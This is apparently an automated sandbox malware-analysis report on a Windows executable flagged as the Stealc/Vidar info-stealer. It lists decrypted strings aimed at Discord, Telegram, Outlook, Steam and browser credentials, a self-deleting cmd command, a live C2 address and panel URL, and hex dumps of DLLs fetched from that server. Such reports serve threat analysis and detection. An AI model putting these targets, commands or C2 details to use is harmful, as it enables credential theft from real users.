Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: %APPDATA%
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: %USERPROFILE%
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: %DOCUMENTS%
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: %PROGRAMFILES%
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: %RECENT%
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: *.lnk
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: files
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: \discord\
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: \Local Storage\leveldb
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: \Telegram Desktop\
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: key_datas
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: map*
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: F8806DD0C461824F*
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Telegram
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: *.tox
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: *.ini
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Password
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: 00000001
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: 00000002
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: 00000003
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: 00000004
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Pidgin
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: \.purple\
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: accounts.xml
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: token:
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Software\Valve\Steam
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: SteamPath
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: \config\
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: ssfn*
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: config.vdf
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: DialogConfig.vdf
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: libraryfolders.vdf
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: loginusers.vdf
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: \Steam\
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: sqlite3.dll
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: browsers
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: done
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: soft
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: \Discord\tokens.txt
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: https
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: POST
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: HTTP/1.1
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: hwid
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: build
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: token
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: file_name
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: file
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: message
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.YEnIrzZUUw.exe.400000.0.unpack String decryptor: screenshot.jpg
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00409540
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_004155A0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00406C10
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_004094A0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_0040BF90
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8F6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C8F6C80

Compliance

barindex
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Unpacked PE file: 0.2.YEnIrzZUUw.exe.400000.0.unpack
Source: YEnIrzZUUw.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Binary string: mozglue.pdbP source: YEnIrzZUUw.exe, 00000000.00000002.2266334227.000000006C95D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: YEnIrzZUUw.exe, 00000000.00000002.2266689058.000000006CB1F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: C:\vivuxaju.pdb source: YEnIrzZUUw.exe
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: YEnIrzZUUw.exe, 00000000.00000002.2266689058.000000006CB1F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: YEnIrzZUUw.exe, 00000000.00000002.2266334227.000000006C95D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: IDBAKKECAE.exe, 00000007.00000000.2130873887.000000000059C000.00000002.00000001.01000000.00000009.sdmp, IDBAKKECAE.exe, 00000007.00000002.4164416328.000000000059C000.00000002.00000001.01000000.00000009.sdmp, tiktok[1].exe.0.dr, IDBAKKECAE.exe.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00412570
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D1C0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,LoadLibraryA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004015C0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00411650
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040B610
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040DB60
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00411B80
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040D540
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_004121F0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking

barindex
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49730 -> 185.172.128.111:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49730 -> 185.172.128.111:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.111:80 -> 192.168.2.4:49730
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49730 -> 185.172.128.111:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 185.172.128.111:80 -> 192.168.2.4:49730
Source: Malware configuration extractor URLs: 185.172.128.111/f993692117a3fda2.php
Source: Malware configuration extractor URLs: http://185.172.128.111/f993692117a3fda2.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 07:41:02 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 07:41:08 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 07:41:09 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 07:41:10 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 